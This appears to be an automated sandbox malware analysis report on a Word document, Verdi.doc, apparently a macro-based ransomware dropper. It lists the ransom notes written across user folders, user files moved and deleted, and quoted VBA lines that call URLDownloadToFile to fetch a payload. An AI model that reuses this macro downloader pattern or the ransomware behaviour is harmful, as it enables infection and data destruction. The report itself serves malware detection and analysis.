Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-312302014-279660585-3511680526-1004\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\document building blocks\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\document building blocks\1033\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\document building blocks\1033\14\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\internet explorer\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\internet explorer\quick launch\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\implicitappshortcuts\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\taskbar\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\internet explorer\userdata\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\mmc\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\office\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\office\recent\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\proof\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\protect\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\protect\s-1-5-21-312302014-279660585-3511680526-1004\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\speech\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\systemcertificates\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\systemcertificates\my\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\systemcertificates\my\certificates\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\systemcertificates\my\crls\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\systemcertificates\my\ctls\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\templates\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\templates\livecontent\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\templates\livecontent\managed\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\templates\livecontent\managed\document themes\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\templates\livecontent\managed\document themes\1033\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\templates\livecontent\managed\smartart graphics\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\templates\livecontent\managed\smartart graphics\1033\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\templates\livecontent\managed\word document building blocks\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\templates\livecontent\managed\word document building blocks\1033\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\templates\livecontent\user\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\templates\livecontent\user\document themes\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\templates\livecontent\user\document themes\1033\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\templates\livecontent\user\smartart graphics\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\templates\livecontent\user\smartart graphics\1033\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\templates\livecontent\user\word document building blocks\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\templates\livecontent\user\word document building blocks\1033\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\uproof\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\windows\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\windows\cookies\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\windows\cookies\low\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\windows\dntexception\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\windows\dntexception\low\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\windows\iecompatcache\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\windows\iecompatcache\low\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\windows\iecompatuacache\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\windows\iecompatuacache\low\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\windows\iedownloadhistory\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\windows\libraries\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\windows\network shortcuts\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\windows\printer shortcuts\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\windows\privacie\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\windows\privacie\low\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\windows\recent\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\windows\recent\automaticdestinations\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\windows\recent\customdestinations\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\windows\recent items\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\windows\sendto\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\windows\start menu\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\accessories\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\accessories\accessibility\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\accessories\system tools\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\administrative tools\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\maintenance\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\windows\templates\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\windows\themes\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\word\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\word\startup\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\mozilla\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\mozilla\extensions\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\mozilla\firefox\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\mozilla\firefox\crash reports\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\mozilla\firefox\crash reports\events\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\bookmarkbackups\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\crashes\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\crashes\events\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\datareporting\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\datareporting\archived\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\datareporting\archived\2016-12\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\gmp\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\gmp\winnt_x86-msvc\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\gmp-eme-adobe\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\gmp-eme-adobe\15\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\gmp-gmpopenh264\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\gmp-gmpopenh264\1.5.3\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\healthreport\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\minidumps\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\saved-telemetry-pings\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\sessionstore-backups\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\storage\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\storage\permanent\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\storage\permanent\chrome\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\storage\permanent\chrome\idb\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\storage\permanent\chrome\idb\2918063365piupsah.files\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\storage\permanent\moz-safe-about+home\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\storage\permanent\moz-safe-about+home\idb\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.files\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\22qkc0w7.default\webapps\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\sun\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\sun\java\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\sun\java\deployment\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\contacts\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\desktop\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\desktop\bnagmgsplo\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\desktop\eowrvpqccs\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\desktop\gaobcviqij\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\desktop\palrgucveh\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\desktop\qncycdfijj\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\desktop\sqsjkebwdt\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\documents\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\documents\bnagmgsplo\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\documents\eowrvpqccs\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\documents\gaobcviqij\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\documents\my music\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\documents\my pictures\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\documents\my videos\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\documents\palrgucveh\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\documents\qncycdfijj\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\documents\sqsjkebwdt\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\downloads\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\favorites\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\favorites\links\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\favorites\links for united states\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\links\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\recent\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\saved games\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\searches\decrypt-files.txtJump to behavior
Modifies existing user documents (likely ransomware behavior)Show sources
Source: C:\Windows\Temp\wupd12.14.tmpFile moved: C:\Users\user\Desktop\GAOBCVIQIJ\GAOBCVIQIJ.docxJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile deleted: C:\Users\user\Desktop\GAOBCVIQIJ\GAOBCVIQIJ.docxJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile moved: C:\Users\user\Desktop\GAOBCVIQIJ\QNCYCDFIJJ.xlsxJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile deleted: C:\Users\user\Desktop\GAOBCVIQIJ\QNCYCDFIJJ.xlsxJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile moved: C:\Users\user\Desktop\QCFWYSKMHA.pdfJump to behavior

System Summary:

barindex
Document contains an embedded VBA macro with suspicious stringsShow sources
Source: Verdi.docOLE, VBA macro line: Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Source: Verdi.docOLE, VBA macro line: Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Source: Verdi.docOLE, VBA macro line: Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Source: Verdi.docOLE, VBA macro line: Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Source: Verdi.docOLE, VBA macro line: URLDownloadToFile 0, v1, v2, 0, 0
Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function dwn1, String urldownloadtofile: URLDownloadToFile 0, v1, v2, 0, 0Name: dwn1
Office process drops PE fileShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Windows\Temp\wupd12.14.tmpJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GKZSIVUJ\wordupd[1].tmpJump to dropped file
Contains functionality to communicate with device driversShow sources
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_00401430: DeviceIoControl,5_2_00401430
Creates files inside the system directoryShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Windows\Temp\wupd12.14.tmpJump to behavior
Creates mutexesShow sources
Source: C:\Windows\Temp\wupd12.14.tmpMutant created: \Sessions\1\BaseNamedObjects\Global\5e4c085c3c4e0000
Detected potential crypto functionShow sources
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004238495_2_00423849
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_0040C4605_2_0040C460
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004062735_2_00406273
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004092305_2_00409230
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_00406CF05_2_00406CF0
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004375605_2_00437560
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004219E05_2_004219E0
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004219EF5_2_004219EF
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004C5A405_2_004C5A40
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004C68535_2_004C6853
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004C7E655_2_004C7E65
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004C32755_2_004C3275
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004C6A0D5_2_004C6A0D
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004CD4085_2_004CD408
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004C860B5_2_004C860B
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004C92075_2_004C9207
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004CC0185_2_004CC018
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004C5C1B5_2_004C5C1B
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004C7A3C5_2_004C7A3C
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004CCED85_2_004CCED8
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004CC6D05_2_004CC6D0
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004C98D25_2_004C98D2
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004C16EF5_2_004C16EF
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004C3CE15_2_004C3CE1
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004C6EF05_2_004C6EF0
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004C668E5_2_004C668E
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004CBE835_2_004CBE83
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004C909D5_2_004C909D
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004C18945_2_004C1894
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004C9A955_2_004C9A95
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004C70A75_2_004C70A7
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004C134E5_2_004C134E
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004C2F445_2_004C2F44
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004DA3465_2_004DA346
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004C895D5_2_004C895D
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004C476D5_2_004C476D
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004C6B775_2_004C6B77
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004C39705_2_004C3970
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004CD7705_2_004CD770
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004C97005_2_004C9700
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004C21035_2_004C2103
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004C3B3C5_2_004C3B3C
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004C61395_2_004C6139
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004D8B385_2_004D8B38
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004C633B5_2_004C633B
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004C6D335_2_004C6D33
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004DBBCE5_2_004DBBCE
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004C5DC35_2_004C5DC3
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004DB1EC5_2_004DB1EC
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004CB3EB5_2_004CB3EB
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004CA1F85_2_004CA1F8
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004C33F45_2_004C33F4
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004CA9895_2_004CA989
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004C2D845_2_004C2D84
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004C8B985_2_004C8B98
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004C35975_2_004C3597
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004CCB925_2_004CCB92
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004C2BAE5_2_004C2BAE
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004C5FA45_2_004C5FA4
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004C37A05_2_004C37A0
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004C9FA25_2_004C9FA2
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004C51B25_2_004C51B2
Document contains embedded VBA macrosShow sources
Source: Verdi.docOLE indicator, VBA macros: true
Document contains no OLE stream with summary informationShow sources
Source: Verdi.docOLE indicator has summary info: false
Source: Verdi.docOLE indicator has summary info: false
Document has an unknown application nameShow sources
Source: Verdi.docOLE indicator application name: unknown
Source: Verdi.docOLE indicator application name: unknown
Dropped file seen in connection with other malwareShow sources
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GKZSIVUJ\wordupd[1].tmp 806FC33650B7EC35DD01A06BE3037674AE3CC0DB6BA1E3F690EE9BA9403C0627
Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\wupd12.14.tmp 806FC33650B7EC35DD01A06BE3037674AE3CC0DB6BA1E3F690EE9BA9403C0627
Reads the hosts fileShow sources
Source: C:\Windows\Temp\wupd12.14.tmpFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Classification labelShow sources
Source: classification engineClassification label: mal100.rans.spre.phis.spyw.expl.evad.winDOC@9/176@0/9
Contains functionality to instantiate COM classesShow sources
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_0043947E CoInitializeEx,Sleep,CoCreateInstance,CoUninitialize,5_2_0043947E
